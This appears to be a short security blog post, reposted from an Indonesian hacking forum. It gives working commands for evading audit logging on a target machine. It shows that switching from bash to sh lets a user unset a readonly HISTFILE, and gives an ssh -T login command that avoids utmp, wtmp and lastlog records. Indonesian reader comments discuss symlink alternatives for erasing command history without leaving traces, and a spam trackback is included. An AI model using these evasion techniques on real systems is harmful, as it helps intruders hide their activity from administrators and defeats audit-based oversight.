[tips n trick] ReadOnly environment variable bypass
Someone /at/ k-elektronik gives simple method to bypass restricted readonly environment variables on target machine. He gives simple case where an admin could restrict the access to HISTFILE. Here’s the simple PoC to bypass the restriction:
——- Cut here ———-
[~]$ cat /etc/profile|grep readonly
readonly -a HISTFILE
readonly HISTFILESIZE
readonly HISTSIZE
readonly HISTIGNORE
readonly PATH
readonly bash
[ ~]$ echo $HISTFILE
/home/audit/user.history
[~]$ unset HISTFILE
-bash: unset: HISTFILE: cannot unset: readonly variable
[~]$ sh
sh-3.1$ echo $HISTFILE
/home/audit/user.history
sh-3.1$ unset HISTFILE
sh-3.1$ echo $HISTFILE
sh-3.1$ echo bypassed
bypassed
sh-3.1$
——- Cut here ———-
The other trick could be login into the server without invoking tty, login without invoking tty also wouldn’t logged in utmp, wtmp, lastlog, and also bypass the restriction on /etc/profile. Here’s how to login into system without invoking the tty:
$ ssh -T -l <user> <IP> “/bin/sh -i”
Taken from: http://kecoak-elektronik.net/forum/viewtopic.php?t=1006
2 Responses to “[tips n trick] ReadOnly environment variable bypass”
Trackbacks/Pingbacks
- Buspar. - Buspar.... Buspar....
Leave a Reply
saya lebih senang menggunakan trik tua, menggunakan simbolik link 🙂
logout dan semua musnah (saya pikir berbalik dengan perlakuan unset)
tetapi terima kasih buat tips berganti shell , ingat yang di readonly cuma bash 🙂
..nuhun nyak .. 🙂
Saya cenderung lebih seneng menggunakan unset HISTFILE di banding simbolik link, karena dengan menggunakan simbolik link artinya ada perubahan yang anda lakukan dan itu menjadikan “kebersihan” servernya berkurang.
Permasalahan ganti shell dan bisa mengunset HISTFILE di sh, bukan karena cuma bash nya yang di readonly saja, silakan sh di readonly mestinya tetep bisa di bypass, permasalahannya ada di sistem unix/linux yang sebagian besar hanya mensupport satu HISTFILE shell
Salam,